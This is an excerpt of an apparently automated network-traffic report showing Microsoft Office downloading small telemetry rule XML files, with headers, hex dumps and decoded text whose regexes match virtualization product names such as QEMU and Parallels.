                                                  2024-10-31 19:50:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.45238413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:45 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 502
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6A0D312"
                                                  x-ms-request-id: 10f07cf3-601e-0070-28ce-2aa0c9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195045Z-159b85dff8flqhxthC1DFWsvrs000000024000000000455f
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:45 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.45238213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:45 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 470
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBB181F65"
                                                  x-ms-request-id: a3f41134-c01e-00ad-7d0b-29a2b9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195045Z-15b8d89586fxdh48ft0acdbg4400000003pg00000000m28z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:45 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.45238013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:45 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 411
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B989AF051"
                                                  x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195045Z-16849878b786fl7gm2qg4r5y700000000a9g00000000a3ga
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:45 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.45238113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:45 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:45 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 485
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                  ETag: "0x8DC582BB9769355"
                                                  x-ms-request-id: 1048e377-301e-0000-11d0-2aeecc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195045Z-159b85dff8f2qnk7hC1DFWwa2400000000fg000000009a58
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:45 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.45238513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:46 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:46 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D30478D"
                                                  x-ms-request-id: 151676fb-b01e-0084-4068-28d736000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195046Z-15b8d89586f989rkwt13xern54000000056g00000000gs0r
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.45238713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:46 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:46 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BB9B6040B"
                                                  x-ms-request-id: e138989b-f01e-003f-497f-2ad19d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195046Z-17c5cb586f6p5pndayxh2uxv5400000001hg00000000kpte
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:46 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.45238613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:46 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:46 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3F48DAE"
                                                  x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195046Z-16849878b78qg9mlz11wgn0wcc00000009g000000000ty50
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:46 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.45238813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:46 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:46 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3CAEBB8"
                                                  x-ms-request-id: 3c311aa7-c01e-008e-22a5-2a7381000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195046Z-159b85dff8fx9jp8hC1DFWp25400000001z0000000008dns
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:46 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.45238913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:46 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:46 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:46 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB5284CCE"
                                                  x-ms-request-id: 57ce5cde-c01e-000b-111a-28e255000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195046Z-15b8d89586fst84kttks1s2css00000003pg000000009m32
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:46 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.45239013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91EAD002"
                                                  x-ms-request-id: efd1d517-701e-003e-7b31-2a79b3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-15b8d89586fbmg6qpd9yf8zhm000000004vg00000000fdgk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:47 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.45239213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 475
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA740822"
                                                  x-ms-request-id: 670c0d8f-b01e-0002-01b6-291b8f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-15b8d89586fbmg6qpd9yf8zhm000000004ug00000000k7pr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
